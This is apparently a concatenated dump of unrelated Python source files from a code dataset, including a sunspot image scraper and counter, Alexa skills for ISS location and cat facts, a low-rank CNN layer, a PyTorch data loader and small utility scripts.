        # NOTE(review): `super.get()` references the builtin `super` type,
        # not super(); calling this raises AttributeError.
        super.get()
    def delete(self):
        # NOTE(review): same issue as get(); should be super().delete().
        super.delete()
if __name__=="__main__":
    # Manual smoke test: run create/update against sample JSON files on disk.
    jsonobj = json.load(open("create_report.json","r"))
    saver = SQLSaver()
    saver.create(jsonobj)
    jsonobj=json.load(open("create_ingest.json","r"))
    saver.create(jsonobj)
    jsonobj=json.load(open("update_ingest.json","r"))
    saver.update(jsonobj)
    # rowsreportsaffected=saver.save({'reports':[{'filename':'file01.pdf','created_at':'2020-01-09 15:00:00','ingested_at':'2020-01-09 15:01:00','currentloc':'/home/shareddata'},{'filename':'file02.pdf','created_at':'2020-01-09 16:00:00','ingested_at':'2020-01-09 16:01:00','currentloc':'/home/shareddata'}])
    # rowsingestsaffected=saver.save({'ingests':[{'text':'This is good weather?','section':'observation','created_at':'2020-01-02 12:33:33','ingest_id':'1','predicted_category':'DOCTRINE','annotated_category':'DOCTRINE'}]})
    # rowsingestupdate=save.update({'ingests':[{'id':'1','annotated_category':'PERSONNEL'}]})
    pass
|
422 | c55991e738c89ee09dabd79d514e710e0fcbac85 | from splinter import Browser
from time import sleep
from datetime import datetime, timedelta
import os, sys
import urllib
import cv2
import numpy as np
from PIL import Image
import imutils
import csv
class Scraper():
start_date = datetime(2018, 1, 8)
url = 'http://spaceweather.com/'
def scrape(self):
self.browser = Browser('firefox')
self.browser.driver.set_page_load_timeout(60)
self.browser.visit(self.url)
for day in self.get_days():
self.scrape_day(day)
def scrape_day(self, day):
self.browser.select('month', day.strftime('%m'))
self.browser.select('day', day.strftime('%d'))
self.browser.select('year', day.strftime('%Y'))
button = self.browser.find_by_name('view')
button.click()
text = self.browser.find_by_css('.solarWindText')[4].text
number = int(text.split(' ')[2].strip())
link = self.browser.find_link_by_partial_href('images{}/'.format(day.strftime('%Y')))['href']
folder_name = "data/{}{}{}".format(day.strftime('%Y'), day.strftime('%m'), day.strftime('%d'))
image_name = "{}/image.gif".format(folder_name)
txt_name = "{}/data.txt".format(folder_name)
os.mkdir(folder_name)
urllib.urlretrieve(link, image_name)
img = Image.open(image_name)
img.save("{}/image.png".format(folder_name), 'png', optimize=True, quality=70)
txt_file = open(txt_name, 'w')
txt_file.write(str(number))
txt_file.close()
print("Downloaded data for {}, sunspots: {}".format(day.strftime('%m/%d/%Y'), number))
def get_days(self):
days = []
for i in range(0, 8):
base = self.start_date + timedelta(days=7 * i)
first = base
second = base + timedelta(days=2)
third = base + timedelta(days=4)
days.append(first)
days.append(second)
days.append(third)
return days
class Entry():
folder = None
date = None
sunspots = -1
image_path = None
counted_sunspots = 0
sections = [0, 0, 0, 0]
def nothing(self, *arg):
pass
def __init__(self, folder, date, sunspots, image_path):
self.folder = folder
self.date = date
self.sunspots = sunspots
self.image_path = image_path
def process(self):
frame = cv2.imread(self.image_path)
height, width, channels = frame.shape
frameBGR = cv2.GaussianBlur(frame, (1, 1), 0)
hsv = cv2.cvtColor(frameBGR, cv2.COLOR_BGR2HSV)
colorLow = np.array([0,90,80])
colorHigh = np.array([10,255,255])
mask = cv2.inRange(hsv, colorLow, colorHigh)
result = cv2.bitwise_and(frame, frame, mask=mask)
image_edged = cv2.Canny(mask, 50, 100)
image_edged = cv2.dilate(image_edged, None, iterations=1)
image_edged = cv2.erode(image_edged, None, iterations=1)
cnts = cv2.findContours(image_edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
image_contours = cv2.bitwise_not(result)
self.counted_sunspots = 0
self.sections = [0, 0, 0, 0]
section_1_start, section_1_end = 0, height/4
section_2_start, section_2_end = height/4, height/4 * 2
section_3_start, section_3_end = height/4 * 2, height/4 * 3
section_4_start, section_4_end = height/4 * 3, height/4 * 4
cv2.line(image_contours, (0, section_1_end), (width, section_1_end), (0, 0, 0), 5)
cv2.line(image_contours, (0, section_2_end), (width, section_2_end), (0, 0, 0), 10)
cv2.line(image_contours, (0, section_3_end), (width, section_3_end), (0, 0, 0), 5)
cv2.circle(image_contours, (width/2, height/2), width/2, (0, 0, 0), 5)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(image_contours, self.date.strftime('%a %b %d'), (20, 50), font, 2, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, self.date.strftime('SSN: {}'.format(self.sunspots)), (20, 100), font, 1.5, (0, 0, 0), 2, cv2.LINE_AA)
for c in cnts:
if cv2.contourArea(c) < 5:
continue
(x,y),radius = cv2.minEnclosingCircle(c)
x = int(x)
y = int(y)
radius = int(radius)
cv2.circle(image_contours, (x, y), radius, (100, 100, 255), -1)
self.counted_sunspots = self.counted_sunspots + 1
if y >= section_1_start and y <= section_1_end:
#cv2.putText(image_contours, '1', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[0] = self.sections[0] + 1
elif y >= section_2_start and y <= section_2_end:
#cv2.putText(image_contours, '2', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[1] = self.sections[1] + 1
elif y >= section_3_start and y <= section_3_end:
#cv2.putText(image_contours, '3', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[2] = self.sections[2] + 1
elif y >= section_4_start and y <= section_4_end:
#cv2.putText(image_contours, '4', (x, y - 10), font, 0.8, (100, 100, 255), 2, cv2.LINE_AA)
self.sections[3] = self.sections[3] + 1
print('Counted sunspots: {}'.format(self.counted_sunspots))
print(self.sections)
cv2.putText(image_contours, 'Section 1: {}'.format(self.sections[0]), (20, 130), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, 'Section 2: {}'.format(self.sections[1]), (20, 160), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, 'Section 3: {}'.format(self.sections[2]), (20, 190), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(image_contours, 'Section 4: {}'.format(self.sections[3]), (20, 220), font, 1, (0, 0, 0), 2, cv2.LINE_AA)
colorLow = np.array([0,0,90])
colorHigh = np.array([0,0,255])
mask = cv2.inRange(hsv, colorLow, colorHigh)
image_contours[mask > 0] = (0, 0, 0)
vis = np.concatenate((frame, image_contours), axis=1)
cv2.imwrite('out/images/{}.png'.format(self.folder), vis)
class Processor():
entries = []
def load(self):
folders = os.listdir("data")
for folder in folders:
year = int(folder[:4])
month = int(folder[4:6])
day = int(folder[6:8])
date = datetime(year, month, day)
image_name = "data/{}/image.png".format(folder)
txt_name = "data/{}/data.txt".format(folder)
txt_file = open(txt_name, 'r')
content = txt_file.readlines()
txt_file.close()
number = int(content[0])
print(folder)
entry = Entry(folder, date, number, image_name)
entry.process()
self.entries.append(entry)
self.entries.sort(key=lambda x: x.date, reverse=False)
def compute(self):
for section in range(0, 4):
total = 0
for entry in self.entries:
total += entry.sections[section]
average = float(total) / float(len(self.entries))
print('-------[Section {}]-------'.format(section + 1))
print('Total: {}'.format(total))
print('Average: {}'.format(average))
total = 0
sections_data = [["date", "section_1", "section_2", "section_3", "section_4"]]
numbers_data = [["date", "reported", "visible"]]
for entry in self.entries:
total += entry.counted_sunspots
sections_data.append([entry.date.strftime("%Y/%m/%d")] + entry.sections)
numbers_data.append([entry.date.strftime("%Y/%m/%d")] + [entry.sunspots, entry.counted_sunspots])
average = float(total) / float(len(self.entries))
print('---------[TOTAL]---------')
print('Total: {}'.format(total))
print('Average: {}'.format(average))
csv_file = open('out/sections.csv', 'w')
writer = csv.writer(csv_file)
writer.writerows(sections_data)
csv_file.close()
csv_file = open('out/numbers.csv', 'w')
writer = csv.writer(csv_file)
writer.writerows(numbers_data)
csv_file.close()
scraper = Scraper()
scraper.scrape()
processor = Processor()
processor.load()
processor.compute() |
423 | b767519229058b50183d78bb97121f050e5b6bad | # defining private variables
class Privacy:
    """Demonstrates a name-mangled ("private") attribute.

    The double-underscore prefix makes __val accessible inside the class
    only via self.__val; externally it is stored as _Privacy__val.
    """

    def __init__(self, val):
        # Store the constructor argument (the original ignored `val` and
        # hard-coded 900).
        self.__val = val
        print("Private data member =", self.__val, "\n")


value = Privacy(800)
print("Value not changable\n")
# Accessing value.__val from outside the class raises AttributeError due to
# name mangling; the original let this crash the demo, so catch and show it.
try:
    value.__val
except AttributeError as err:
    print("Direct access fails:", err)
|
424 | b679444fde7cd8eb819443922f37ee54c0f29de4 | from pirates.teleport.AreaTeleportActor import AreaTeleportActor
class DoorTeleportActor(AreaTeleportActor):
    """Teleport actor for door transitions; currently adds no behavior
    beyond AreaTeleportActor."""
    pass
|
425 | f714c7006f50379cc7508a13d710d902d38d2d1f | import torch
import torch.nn as nn
import torch.nn.functional as F
# Const. low-rank version
class xCNNlow(torch.nn.Module):
    """Low-rank 'correlated' convolution layer.

    Only ``filters // times`` kernels are learned directly
    (``conv_weights``); the remaining kernels are generated at each forward
    pass as a rank-``rank`` linear combination of the learned ones:
    ``column_weights @ (row_weights @ flatten(conv_weights))``.

    NOTE(review): relies on a module-level global ``device`` being defined
    elsewhere in this file — confirm before reuse.
    """

    def __init__(self, channels, filters, kernel_size, padding=0, stride=1, groups=1, rank=1, bias=True):
        super(xCNNlow, self).__init__()
        self.filters = filters
        self.times = 2  # fraction of kernels learned directly: filters // times
        self.kernel_size = kernel_size
        self.channels = channels // groups
        self.padding = padding
        self.stride = stride
        self.biasTrue = bias
        self.rank = rank
        self.groups = groups

        # Directly learned kernels plus the two low-rank factor matrices that
        # generate the remaining (filters - filters//times) kernels.
        self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times, channels, kernel_size, kernel_size).to(device))
        self.column_weights = nn.Parameter(torch.Tensor(filters - filters // self.times, self.rank).to(device))
        self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters // self.times).to(device))

        # FIX: torch.nn.init.xavier_uniform (no underscore) is deprecated;
        # use the in-place variant.
        torch.nn.init.xavier_uniform_(self.conv_weights)
        self.column_weights.data.uniform_(-0.1, 0.1)
        self.row_weights.data.uniform_(-0.1, 0.1)
        if self.biasTrue:
            self.bias = nn.Parameter(torch.Tensor(filters).to(device))
            self.bias.data.uniform_(-0.1, 0.1)

    def forward(self, input):
        """Conv2d with [learned kernels ; low-rank generated kernels] stacked along dim 0."""
        self.correlated_weights = torch.mm(
            self.column_weights,
            torch.mm(self.row_weights, self.conv_weights.reshape(self.filters // self.times, -1))
        ).reshape(self.filters - self.filters // self.times, self.channels, self.kernel_size, self.kernel_size)

        weight = torch.cat((self.conv_weights, self.correlated_weights), dim=0)
        if self.biasTrue:
            return F.conv2d(input, weight, bias=self.bias, padding=self.padding, stride=self.stride)
        return F.conv2d(input, weight, padding=self.padding, stride=self.stride)
#count FLOPs
def count_op_xCNNlow(m, x, y):
    """THOP-style FLOP-counting hook for an xCNNlow layer.

    Stores the total operation count in ``m.total_ops`` as a 1-element
    torch.Tensor; ``x`` is the tuple of layer inputs, ``y`` the output.
    """
    inp = x[0]
    batch = inp.size()[0]
    cin = m.channels
    cout = m.filters
    k = m.kernel_size
    out_h, out_w = y.size(2), y.size(3)

    # Convolution cost: k*k multiply-adds (+1 bias add if present) per input
    # channel, for every output element.
    per_element = k * k + (1 if m.biasTrue is True else 0)
    out_elements = batch * out_h * out_w * cout
    conv_ops = out_elements * per_element * cin // m.groups

    # Cost of generating the correlated kernels from the low-rank factors:
    # row_weights @ flat(conv_weights) then column_weights @ (that product).
    direct = m.filters // m.times
    generated = m.filters - direct
    patch = cin * k * k
    lin_ops = (direct + (direct - 1)) * (m.rank * patch) \
        + (m.rank + (m.rank - 1)) * (generated * patch)

    total_ops = lin_ops + conv_ops
    print(lin_ops, conv_ops)
    m.total_ops = torch.Tensor([int(total_ops)])
|
426 | 726f133bcf592315c42f8701be8308422ffbf0d9 |
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import reverse_geocoder as rg
from geopy import distance
from geopy.geocoders import Nominatim
import requests
import time
'''
:::::::: ::::::::: ::: :::::::: :::::::::: ::: ::: ::: ::: ::: ::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#++:++#++ +#++:++#+ +#++:++#++: +#+ +#++:++# +#+ +:+ +#+ +#++:++#++: +#+ +#++:++ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+#+# #+#+# #+# #+# #+# #+# #+#
######## ### ### ### ######## ########## ### ### ### ### ########## ### ### ###
'''
app = Flask(__name__)
ask = Ask(app, "/space_walk")
def find_ordinals(city, iss):
    """Return the intercardinal direction of the ISS relative to a city.

    Both arguments are (lat, lon) tuples; the result is one of
    'NorthEast', 'NorthWest', 'SouthEast', 'SouthWest'.
    """
    north_south = 'North' if iss[0] - city[0] > 0 else 'South'
    east_west = 'East' if iss[1] - city[1] > 0 else 'West'
    return north_south + east_west
def where_is_the_iss_now():
    """Locate the ISS and describe its position relative to the nearest city.

    Queries the open-notify API for the ISS position, reverse-geocodes the
    nearest known city, and builds a spoken answer.

    Returns a tuple:
        (answer, latitude, longitude, distance_miles, ordinal, name,
         admin1, country_name)
    NOTE(review): implicitly returns None if 'iss_position' is missing or
    falsy in the API response — callers unpack 8 values and would crash;
    confirm whether that case can occur.
    """
    iss_now_website = 'http://api.open-notify.org/iss-now.json'
    webby = requests.get(iss_now_website)
    data = webby.json()
    if data['iss_position']:
        # API returns coordinates as strings.
        longitude = data['iss_position'].get('longitude')
        latitude = data['iss_position'].get('latitude')
        # mode=1 = single-threaded reverse geocode of the nearest city.
        results = rg.search((latitude, longitude), mode=1)
        lat, lon, name, admin1, admin2, cc = results[0].values()
        ordinal = find_ordinals(city=(float(lat), float(lon)), iss=(float(latitude), float(longitude)))
        # Country-code -> country-name lookup table (list of {Code, Name}).
        country_cc = requests.get(
            'https://pkgstore.datahub.io/core/country-list/data_json/data/8c458f2d15d9f2119654b29ede6e45b8/data_json.json')
        country_cc = country_cc.json()
        iss_coordinates = (latitude, longitude)
        k_nearest_coordinates = (lat, lon)
        distance_miles = distance.distance(k_nearest_coordinates, iss_coordinates).miles
        country_name = ''
        for i in filter(lambda d: d.get('Code') == cc, country_cc):
            country_name = i.get('Name')
        location_text = ', '.join([name, admin1, country_name])
        # Beyond 150 miles from the nearest city, assume the ISS is offshore.
        if distance_miles > 150:
            answer = 'The International Space Station is {} miles {} off the coast of {}'.format(int(distance_miles), ordinal,
                location_text)
        else:
            answer = 'the International Space Station is {} miles {} near {}'.format(int(distance_miles),ordinal, location_text)
        return answer, latitude, longitude, distance_miles, ordinal, name, admin1, country_name
@app.route('/')
def homepage():
    """Root endpoint: empty body — the skill only serves the Alexa route."""
    return ''
@ask.launch
def start_skill():
    """Launch handler: greet the user and re-prompt if they stay silent."""
    reprompt_text = render_template('welcome_message_reprompt')
    greeting = render_template('welcome_message')
    return question(greeting).reprompt(reprompt_text)
@ask.intent('YourLocation')
def pass_over(my_location):
    """Tell the user when the ISS next passes over the spoken location.

    Geocodes ``my_location``, queries the open-notify pass-prediction API,
    and answers with the next rise time and the time remaining until it.

    BUG FIX: the original computed ``time_til_rise`` only inside the
    success branch but used it unconditionally in the final ``statement``,
    raising NameError whenever the API reported a failure.
    """
    geolocator = Nominatim(user_agent='my-application')
    print(my_location)
    # NOTE(review): geocode() returns None for unknown places — the
    # attribute accesses below would then raise; confirm intended handling.
    location = geolocator.geocode(my_location, language='en-US')
    try:
        city = location.address.split(',')[0]
        state = location.address.split(',')[2]
        country = location.address.split(',')[-1]
        location_name = ', '.join([city, state, country])
    except IndexError:
        # Short addresses (fewer than 3 parts): fall back to the last part.
        location_name = location.address.split(',')[-1]
    fly_over = requests.get(
        'http://api.open-notify.org/iss-pass.json?lat={}&lon={}'.format(location.latitude, location.longitude))
    fly_over = fly_over.json()
    if fly_over['message'] == 'success':
        rise = fly_over['response'][0]
        # NOTE(review): label says GMT but localtime() formats in server
        # local time — confirm which is intended.
        answer = time.strftime('%A, %B %d, %Y at %I:%M %p GMT', time.localtime(rise.get('risetime')))
        seconds_until = rise.get('risetime') - time.time()
        hours = int(seconds_until // 3600 % 24)  # NOTE: drops whole days
        minutes = int(seconds_until // 60 % 60)
        minorminutes = 'minute' if minutes == 1 else 'minutes'
        hour_or_hours = 'hour' if hours == 1 else 'hours'
        if hours == 0:
            time_til_rise = "{} {}".format(minutes, minorminutes)
        else:
            time_til_rise = "{} {} and {} {}".format(hours, hour_or_hours, minutes, minorminutes)
        return statement('the next flyover for {} will begin in {} on {}'.format(location_name, time_til_rise, answer))
    # Failure path: respond gracefully instead of crashing with NameError.
    return statement('Sorry, I could not find the next flyover time for {}.'.format(location_name))
@ask.intent('WhereISS')
def share_location():
    """Speak the current ISS position and attach a card with coordinates.

    Delegates the lookup to where_is_the_iss_now(); the card shows rounded
    lat/lon plus distance and direction from the nearest city.
    """
    iss_location, latitude, longitude, distance_miles, ordinal, name, admin1, country_name= where_is_the_iss_now()
    # API values arrive as strings; convert for rounding below.
    latitude, longitude, distance_miles = float(latitude), float(longitude), float(distance_miles)
    return statement(iss_location).standard_card(
        title="Location of the International Space Station",
        text='Latitude {} and Longitude {},\n {} miles {} of {}, {} in {}'.format(round(latitude,2), round(longitude,2), round(distance_miles,0), ordinal, name, admin1, country_name))
@ask.intent('AMAZON.FallbackIntent')
def fallback():
    """Catch unrecognised utterances and re-prompt the user."""
    continue_prompt = render_template('to_continue')
    return question('Sorry, I am not sure what you asked me...{}'.format(continue_prompt))
@ask.intent('AMAZON.NavigateHomeIntent')
def go_home():
    """NavigateHome handler: playful E.T. reference, keeps the session open."""
    return question('et - phone home')
@ask.intent('AMAZON.HelpIntent')
def help_me():
    """Speak the help prompt and keep the session open."""
    return question(render_template('help'))
@ask.intent('Credits')
def speak_credits():
    """Read the skill credits and end the session."""
    return statement(render_template('credits'))
@ask.intent('AMAZON.StopIntent')
def stop():
    """StopIntent handler: say goodbye and end the session."""
    return statement(render_template('bye'))
@ask.intent('AMAZON.CancelIntent')
def cancel():
    """CancelIntent handler: same goodbye as StopIntent."""
    return statement(render_template('bye'))
@ask.session_ended
def session_ended():
    """Session-ended hook: return an empty JSON body with HTTP 200."""
    return "{}", 200
if __name__ == '__main__':
    # Flask development server; debug=True enables the reloader — not for production.
    app.run(debug=True)
|
427 | cae49da8dd436fc51b472c4a88703d8bc6c79bda | import SCons.Util
import xml.dom.minidom, re, os.path
################################################################################
# DocBook pseudobuilder
# TODO: Only generate the output formats that are known
################################################################################
def generate(env) :
    """SCons tool entry point: attach a 'DocBook' pseudo-builder to *env*.

    The builder renders a DocBook source to PDF (via XSL-FO), HTML, and a
    WordPress PHP fragment.
    """
    def remove_doctype(target, source, env) :
        # Post-action for the WordPress output: strip the <!DOCTYPE ...>
        # line the XSLT emits, rewriting the file in place.
        f = open(str(target[0]))
        output = []
        for line in f.readlines() :
            output.append(re.sub("^<!DOCTYPE .*", "", line))
        f.close()
        # NOTE(review): 'wb' mode with str lines implies Python 2 — confirm
        # before porting this tool to Python 3.
        f = open(str(target[0]), 'wb')
        for line in output :
            f.write(line)
        f.close()
    def buildDocBook(env, source) :
        db_env = env.Clone()
        db_env["XMLCATALOGS"] = [db_env["DOCBOOK_XML"]]
        # PDF generation
        fo = db_env.XSLT(os.path.splitext(source)[0] + ".fo", source,
            XSLTSTYLESHEET = db_env["DOCBOOK_XSL_FO"])
        pdf = db_env.FO(fo)
        # HTML generation
        db_env.XSLT(os.path.splitext(source)[0] + ".html", source,
            XSLTSTYLESHEET = db_env["DOCBOOK_XSL_HTML"])
        # WordPress generation
        wp_params = [("wordpress.dir", env.get("DOCBOOK_WP_DIR", "../../wordpress"))]
        # Defaults to the generated PDF's basename when no URL is configured.
        wp_pdf_url = env.get("DOCBOOK_WP_PDF_URL", pdf[0].name)
        if len(wp_pdf_url) > 0 :
            wp_params.append(("pdf.url", wp_pdf_url))
            wp_params.append(("pdf.icon", env.get("DOCBOOK_WP_PDF_ICON", "/icons/pdf.png")))
        wp = db_env.XSLT(os.path.splitext(source)[0] + ".wp.php", source,
            XSLTSTYLESHEET = db_env["DOCBOOK_XSL_WP"],
            XSLTPARAMS = wp_params + env.get("XSLTPARAMS", []))
        db_env.AddPostAction(wp, SCons.Action.Action(remove_doctype, cmdstr = "$FIXCOMSTR"))
    env.AddMethod(buildDocBook, "DocBook")
def exists(env) :
    """SCons tool hook: this tool is always available."""
    return True
|
428 | c139cbc3e693d75ad196e10257ff3028aa835709 | # Complete the hurdleRace function below.
def hurdleRace(k, height):
    """Return how many units the jumper must boost to clear every hurdle.

    :param k: natural jump height
    :param height: list of hurdle heights (non-empty; max() raises on empty)
    :return: max(height) - k when the tallest hurdle exceeds k, else 0
    """
    # Hoisted: the original evaluated max(height) twice.
    tallest = max(height)
    return tallest - k if k < tallest else 0
print(hurdleRace(2, [2,5,4,5,2]))
|
429 | 77971b088a7e076e3bf6d7aa320981a50e7756ce | from flask import Flask
from flask_ask import Ask, statement, question, session
# import json, requests
import random
app = Flask(__name__)
ask = Ask(app, "/")
def get_cat_fact():
    """Return one uniformly random fact from a hard-coded list of cat facts."""
    myFacts = [
        "Cats should not be fed tuna exclusively, as it lacks taurine, an essential nutrient required for good feline health. Make sure you have the proper Pet supplies to keep your cat happy and healthy.",
        "The strongest climber among the big cats, a leopard can carry prey twice its weight up a tree.",
        "A catโs hearing is better than a dogโs. A cat can hear high-frequency sounds up to two octaves higher than a human.",
        "Tylenol and chocolate are both poisionous to cats.",
        "Cats have 30 teeth (12 incisors, 10 premolars, 4 canines, and 4 molars), while dogs have 42. Kittens have baby teeth, which are replaced by permanent teeth around the age of 7 months.",
        "It has been scientifically proven that owning cats is good for our health and can decrease the occurrence of high blood pressure and other illnesses.",
        "A cat canโt climb head first down a tree because every claw on a catโs paw points the same way. To get down from a tree, a cat must back down.",
        "Cats are subject to gum disease and to dental caries. They should have their teeth cleaned by the vet or the cat dentist once a year.",
        "A domestic cat can run at speeds of 30 mph.",
        "Cat families usually play best in even numbers. Cats and kittens should be aquired in pairs whenever possible.",
        "A catโs back is extremely flexible because it has up to 53 loosely fitting vertebrae. Humans only have 34.",
        "The claws on the catโs back paws arenโt as sharp as the claws on the front paws because the claws in the back donโt retract and, consequently, become worn.",
        "Cat paws act as tempetature regulators, shock absorbers, hunting and grooming tools, sensors, and more",
        "Cats see six times better in the dark and at night than humans.",
        "The cat's tail is used to maintain balance.",
        "Cats have 300 million neurons; dogs have about 160 million",
        "Both humans and cats have identical regions in the brain responsible for emotion.",
        "The lightest cat on record is a blue point Himalayan called Tinker Toy, who weighed 1 pound, 6 ounces (616 g). Tinker Toy was 2.75 inches (7 cm) tall and 7.5 inches (19 cm) long.",
        "An adult lion's roar can be heard up to five miles (eight kilometers) away.",
        "You check your cats pulse on the inside of the back thigh, where the leg joins to the body. Normal for cats: 110-170 beats per minute.",
        "The largest cat breed is the Ragdoll. Male Ragdolls weigh between 12 and 20 lbs (5.4-9.0 k). Females weigh between 10 and 15 lbs (4.5-6.8 k).",
        "A cat's normal temperature varies around 101 degrees Fahrenheit.",
        "Unlike other cats, lions have a tuft of hair at the end of their tails.",
        "Cats donโt have sweat glands over their bodies like humans do. Instead, they sweat only through their paws.",
        "The average cat food meal is the equivalent to about five mice.",
        "The first official cat show in the UK was organised at Crystal Palace in 1871.",
        "In just seven years, a single pair of cats and their offspring could produce a staggering total of 420,000 kittens."
    ]
    # BUG FIX: the original called random.ranint (typo for randint), which
    # raised AttributeError on every invocation. random.choice is the
    # idiomatic way to pick one element uniformly.
    return random.choice(myFacts)
@ask.launch
def start_skill():
    """Launch handler: offer the user a cat fact."""
    return question('Hello there, would you like to hear a cat fact?')
@ask.intent("YesIntent")
def share_headlines():
    """Speak one random cat fact and end the session."""
    return statement('Did you know, ' + get_cat_fact())
@ask.intent("NoIntent")
def no_intent():
    """Politely end the session when the user declines a fact."""
    return statement('Ok! Have a wonderful day!')
if __name__ == '__main__':
    # Flask development server; debug=True enables the reloader — not for production.
    app.run(debug=True)
|
430 | 124d7da330aa7c869320e10f4f89cc1c872f85f2 | import matplotlib.pyplot as plt
import sys
# Local helper modules live in this sibling directory.
sys.path.append('coin_flipping_src')
from monte_carlo import monte_carlo
from probability import probability
plt.style.use('bmh')
# Number-of-heads values 0..9 for 10 coin flips.
x_coords = range(10)
# Exact binomial probabilities (thick line)...
probablility_results = [probability(x,10) for x in x_coords]
plt.plot(x_coords,probablility_results,linewidth = 2.5)
# plt.plot([0,1,2,3,4],[0.1, 0.3, 0.5, 0.1, 0.1],linewidth=2.5)
# ...overlaid with 5 Monte Carlo estimates of 100 trials each (thin lines).
for _ in range(5):
    plt.plot(x_coords,[monte_carlo(x,10,100) for x in x_coords],linewidth = 0.75)
# plt.plot([0,1,2,3,4],[0.3, 0.1, 0.4, 0.2, 0.1],linewidth=0.75)
# plt.plot([0,1,2,3,4],[0.2, 0.2, 0.3, 0.3, 0.2],linewidth=0.75)
plt.legend(['True','MC 1','MC 2','MC 3','MC 4','MC 5'])
plt.xlabel('Number of Heads')
plt.ylabel('Probability')
plt.title('True Distribution vs Monte Carlo Simulations for 10 Coin Flips')
plt.savefig('plot.png')
plt.show()
431 | 502da0f0dafe42d3464fabb1d92ae1b0d7ef11f3 | # Check given matrix is valid sudoku or Not.
|
432 | 4e31c2a80bec77a1f5aafc8a91617fb4b2941788 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author: Andrรฉ Pacheco
E-mail: pacheco.comp@gmail.com
This file implements the methods and functions to load the image as a PyTorch dataset
If you find any bug or have some suggestion, please, email me.
"""
from PIL import Image
from torch.utils import data
import torchvision.transforms as transforms
class BuildDataset (data.Dataset):
    """
    Standard PyTorch dataset: extends torch.utils.data.Dataset and implements
    __init__, __len__ and __getitem__.
    """
    def __init__(self, imgs_path, labels, extra_info=None, transform=None):
        """
        Store the image paths, their labels and optional extra information,
        plus an optional transform pipeline. imgs_path[x]'s label must be
        labels[x] (and extra_info[x], when present).

        :param imgs_path (list): image file paths
        :param labels (list): one label per image (or None)
        :param extra_info (list): extra data per image, or None. Default None.
        :param transform (torchvision.transforms.Compose): transforms applied
            to each image; defaults to Resize(224,224) + ToTensor.
        """
        self.imgs_path = imgs_path
        self.labels = labels
        self.extra_info = extra_info
        # if transform is None, we need to ensure that the PIL image will be
        # transformed to tensor, otherwise we'll got an exception
        if (transform is not None):
            self.transform = transform
        else:
            self.transform = transforms.Compose([
                transforms.Resize((224,224)),
                transforms.ToTensor()
            ])
    def __len__(self):
        """ This method just returns the dataset size """
        return len(self.imgs_path)
    def __getitem__(self, item):
        """
        Load and transform the image at index `item`; return it with its
        label, extra information and a derived image id.

        :param item (int): index in [0, len(imgs_path) - 1]
        :return (tuple): (image, label, extra_info, img_name); label and
            extra_info are [] when the corresponding list is None
        """
        image = Image.open(self.imgs_path[item]).convert("RGB")
        # Applying the transformations
        image = self.transform(image)
        # Image id: filename without directory or extension. Assumes
        # '/'-separated paths — TODO confirm behaviour on Windows paths.
        img_name = self.imgs_path[item].split('/')[-1].split('.')[0]
        if self.extra_info is None:
            extra_info = []
        else:
            extra_info = self.extra_info[item]
        if self.labels is None:
            labels = []
        else:
            labels = self.labels[item]
        return image, labels, extra_info, img_name
def get_data_loader (imgs_path, labels, extra_info=None, transform=None, params=None):
    """
    Build a torch DataLoader over BuildDataset(imgs_path, labels, extra_info,
    transform).

    :param imgs_path (list): image file paths
    :param labels (list): one label per image (or None)
    :param extra_info (list, optional): extra per-image data. Default None.
    :param transform (torchvision.transforms, optional): augmentation
        pipeline applied to each image. Default None (Resize + ToTensor).
    :param params (dict, optional): loader settings; missing keys (or
        params=None) fall back to batch_size=30, shuf=True, num_workers=4,
        pin_memory=True.
    :return (torch.utils.data.DataLoader): the configured dataloader
    """
    dt = BuildDataset(imgs_path, labels, extra_info, transform)
    # IDIOM: replace the original chain of `if key in params.keys()` checks
    # with dict.get — identical behaviour, far less boilerplate.
    params = params or {}
    return data.DataLoader(dataset=dt,
                           batch_size=params.get('batch_size', 30),
                           shuffle=params.get('shuf', True),
                           num_workers=params.get('num_workers', 4),
                           pin_memory=params.get('pin_memory', True))
|
433 | 6454790c98b254edeead4e68ef7f5760c9105a57 | #!/usr/bin/python
#
# Dividend!
#
import os
import sys
import urllib2
import math
import numpy
from pylab import *
#
# Dividend adjusted!
#
# Which CSV column to read prices from: 6 = dividend-adjusted close,
# 4 = raw close.
Use_Dividend_Adjusted = True
if ( Use_Dividend_Adjusted ):
    readinIndex = 6
else:
    readinIndex = 4
# Subplots in total
nsubplots = 5
# 1-based subplot indices, top to bottom.
iprice = 1
imacd = 2
#icci = 4
idmi = 3
ibalance = 4
igain = 5
# CCI parameters!!!
CCI_period = 20
# DMI parameters!!!
DMI_period = 14
# CLI arguments: ticker symbol, sampling period ('d'/'w'/'m'), look-back
# length, and whether to run the buy/sell back-test (0/1).
name = str(sys.argv[1])
period = str(sys.argv[2])
time_range = int(sys.argv[3])
predict = bool(int(sys.argv[4]))
# NOTE(review): periodText stays unbound for any other period value, which
# would raise NameError later — confirm only d/w/m are ever passed.
if (period == 'd'):
    periodText = "days"
if (period == 'w'):
    periodText = "weeks"
if (period == 'm'):
    periodText = "months"
def Average(list):
    """Arithmetic mean of a sequence; items may be numbers or numeric strings."""
    return sum(float(v) for v in list) / len(list)
def EMA(list):
    """Linearly weighted average of a sequence.

    The first element gets weight n, the last weight 1, normalised by
